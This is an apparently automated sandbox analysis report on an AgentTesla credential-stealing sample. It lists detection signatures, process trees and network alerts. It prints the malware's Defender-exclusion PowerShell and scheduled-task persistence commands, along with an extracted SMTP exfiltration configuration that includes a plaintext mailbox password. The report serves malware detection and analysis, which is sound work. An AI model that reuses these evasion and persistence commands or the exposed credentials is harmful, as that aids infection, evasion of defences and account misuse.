
Windows Analysis Report
P020241901.exe

Overview

General Information

Sample name: P020241901.exe
Analysis ID: 1410986
MD5: f061401dd36dc8e88017ef9f9a43e5a7
SHA1: ea4d27815a1cf0f447fab333bdd52825e32807e3
SHA256: 935319064e3a30103096a9241c2467b7d19fdbd371d078554a1a7503e1a92cdd
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • P020241901.exe (PID: 4204 cmdline: C:\Users\user\Desktop\P020241901.exe MD5: F061401DD36DC8E88017EF9F9A43E5A7)
    • powershell.exe (PID: 3184 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7284 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 2616 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • P020241901.exe (PID: 7180 cmdline: C:\Users\user\Desktop\P020241901.exe MD5: F061401DD36DC8E88017EF9F9A43E5A7)
  • VKkzqGUhsZwwm.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe MD5: F061401DD36DC8E88017EF9F9A43E5A7)
    • schtasks.exe (PID: 7488 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • VKkzqGUhsZwwm.exe (PID: 7540 cmdline: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe MD5: F061401DD36DC8E88017EF9F9A43E5A7)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.cup.org.pk", "Username": "naseer@cup.org.pk", "Password": "Cup@123#"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
00000009.00000002.3234380229.0000000002A50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000009.00000002.3234380229.0000000002A6A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000E.00000002.3233407833.0000000002B59000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000E.00000002.3233407833.0000000002B3E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
14.2.VKkzqGUhsZwwm.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
14.2.VKkzqGUhsZwwm.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
14.2.VKkzqGUhsZwwm.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x334ab:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3351d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x335a7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33639:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x336a3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33715:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x337ab:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3383b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.P020241901.exe.3799000.10.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.P020241901.exe.3799000.10.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\P020241901.exe, ParentImage: C:\Users\user\Desktop\P020241901.exe, ParentProcessId: 4204, ParentProcessName: P020241901.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe", ProcessId: 3184, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe, ParentImage: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe, ParentProcessId: 7260, ParentProcessName: VKkzqGUhsZwwm.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp", ProcessId: 7488, ProcessName: schtasks.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 203.82.48.116, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\P020241901.exe, Initiated: true, ProcessId: 7180, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49708
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\P020241901.exe, ParentImage: C:\Users\user\Desktop\P020241901.exe, ParentProcessId: 4204, ParentProcessName: P020241901.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp", ProcessId: 2616, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\P020241901.exe, ParentImage: C:\Users\user\Desktop\P020241901.exe, ParentProcessId: 4204, ParentProcessName: P020241901.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe", ProcessId: 3184, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\P020241901.exe, ParentImage: C:\Users\user\Desktop\P020241901.exe, ParentProcessId: 4204, ParentProcessName: P020241901.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp", ProcessId: 2616, ProcessName: schtasks.exe

Snort IDS Alerts

Timestamp                 SID      Source Port  Destination Port  Protocol  Classtype
03/18/24-14:32:22.806223  2855542  49711        587               TCP       A Network Trojan was detected
03/18/24-14:32:22.806223  2855245  49711        587               TCP       A Network Trojan was detected
03/18/24-14:32:22.806223  2840032  49711        587               TCP       A Network Trojan was detected
03/18/24-14:32:19.942080  2030171  49708        587               TCP       A Network Trojan was detected
03/18/24-14:32:22.806223  2851779  49711        587               TCP       A Network Trojan was detected
03/18/24-14:32:19.942080  2839723  49708        587               TCP       A Network Trojan was detected
03/18/24-14:32:19.942146  2855542  49708        587               TCP       A Network Trojan was detected
03/18/24-14:32:19.942146  2855245  49708        587               TCP       A Network Trojan was detected
03/18/24-14:32:22.806192  2030171  49711        587               TCP       A Network Trojan was detected
03/18/24-14:32:22.806192  2839723  49711        587               TCP       A Network Trojan was detected
03/18/24-14:32:19.942146  2840032  49708        587               TCP       A Network Trojan was detected
03/18/24-14:32:19.942146  2851779  49708        587               TCP       A Network Trojan was detected


AV Detection

Source: P020241901.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Avira: detection malicious, Label: HEUR/AGEN.1306659
Source: 0.2.P020241901.exe.3799000.10.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.cup.org.pk", "Username": "naseer@cup.org.pk", "Password": "Cup@123#"}
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | ReversingLabs: Detection: 65%
Source: P020241901.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Joe Sandbox ML: detected
Source: P020241901.exe | Joe Sandbox ML: detected
Source: P020241901.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: P020241901.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: kugJ.pdbSHA256 source: P020241901.exe, VKkzqGUhsZwwm.exe.0.dr
Source: Binary string: kugJ.pdb source: P020241901.exe, VKkzqGUhsZwwm.exe.0.dr
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 4x nop then jmp 06ED8906h (0_2_06ED85E7)
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 4x nop then jmp 06B876CEh (10_2_06B873AF)

Networking

Source: Traffic | Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49708 -> 203.82.48.116:587
Source: Traffic | Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49708 -> 203.82.48.116:587
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49708 -> 203.82.48.116:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49708 -> 203.82.48.116:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49708 -> 203.82.48.116:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49708 -> 203.82.48.116:587
Source: Traffic | Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49711 -> 203.82.48.116:587
Source: Traffic | Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49711 -> 203.82.48.116:587
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49711 -> 203.82.48.116:587
Source: Traffic | Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49711 -> 203.82.48.116:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49711 -> 203.82.48.116:587
Source: Traffic | Snort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.5:49711 -> 203.82.48.116:587
Source: global traffic | TCP traffic: 192.168.2.5:49708 -> 203.82.48.116:587
Source: Joe Sandbox View | ASN Name: NAYATEL-PKNayatelPvtLtdPK
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: mail.cup.org.pk
Source: P020241901.exe, 00000009.00000002.3234380229.0000000002A58000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000E.00000002.3233407833.0000000002B46000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.cup.org.pk
Source: P020241901.exe, 00000000.00000002.2001137973.0000000002581000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000A.00000002.2042466300.0000000002679000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: P020241901.exe, 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp, VKkzqGUhsZwwm.exe, 0000000E.00000002.3230734954.0000000000431000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.P020241901.exe.3799000.10.raw.unpack, n00.cs | .Net Code: meEYaI
Source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, n00.cs | .Net Code: meEYaI

System Summary

Source: 14.2.VKkzqGUhsZwwm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.P020241901.exe.3799000.10.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.P020241901.exe.375e5e0.11.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.P020241901.exe.3799000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.P020241901.exe.4e90000.13.raw.unpack, coEDuL4BIACsOV2Bcb.cs | Large array initialization: array initializer size 18997
Source: 0.2.P020241901.exe.25a3510.0.raw.unpack, coEDuL4BIACsOV2Bcb.cs | Large array initialization: array initializer size 18997
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_0097DCB4
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_04A96CC8
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_04A90006
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_04A90040
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_04A96CB9
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_06ED3FD8
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_06ED3768
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_06ED1C88
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_06ED3BA0
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_06ED20C0
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 0_2_06ED20B0
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_02809378
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_02804A98
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_02809B30
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_02803E80
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_0280CE88
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_028041C8
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CCBCE8
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CC3F48
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CC56D8
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CC2EE8
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CC0040
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CC8B88
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CC9AC8
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CCDDD8
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CC4FF8
Source: C:\Users\user\Desktop\P020241901.exe | Code function: 9_2_05CC3648
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_0251DCB4
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_04BC6CC8
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_04BC0006
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_04BC0040
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_04BC6CB9
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_06B83FD8
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_06B83768
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_06B81C88
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_06B83BA0
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_06B820B0
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 10_2_06B820C0
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_02AA9378
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_02AA4A98
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_02AA9B30
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_02AACE88
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_02AA3E80
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_02AA41C8
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_05F4DD00
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_05F4BCE8
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_05F43F48
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_05F42EE8
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_05F456D8
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_05F40040
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_05F48B88
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_05F49AC8
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_05F44FF8
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Code function: 14_2_05F43648
Source: P020241901.exe, 00000000.00000002.2000269983.000000000070E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs P020241901.exe
Source: P020241901.exe, 00000000.00000002.2018716291.0000000006C90000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs P020241901.exe
Source: P020241901.exe, 00000000.00000002.2002617637.000000000375E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename9bd5bdf1-67e0-44ac-acb3-9f26dbc64b5d.exe4 vs P020241901.exe
Source: P020241901.exe, 00000000.00000002.2001137973.00000000025CE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename9bd5bdf1-67e0-44ac-acb3-9f26dbc64b5d.exe4 vs P020241901.exe
Source: P020241901.exe, 00000000.00000002.2019464746.0000000007268000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamekugJ.exe< vs P020241901.exe
Source: P020241901.exe, 00000000.00000002.2002617637.00000000038E9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs P020241901.exe
Source: P020241901.exe, 00000009.00000002.3231223568.0000000000959000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs P020241901.exe
Source: P020241901.exe | Binary or memory string: OriginalFilenamekugJ.exe< vs P020241901.exe
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
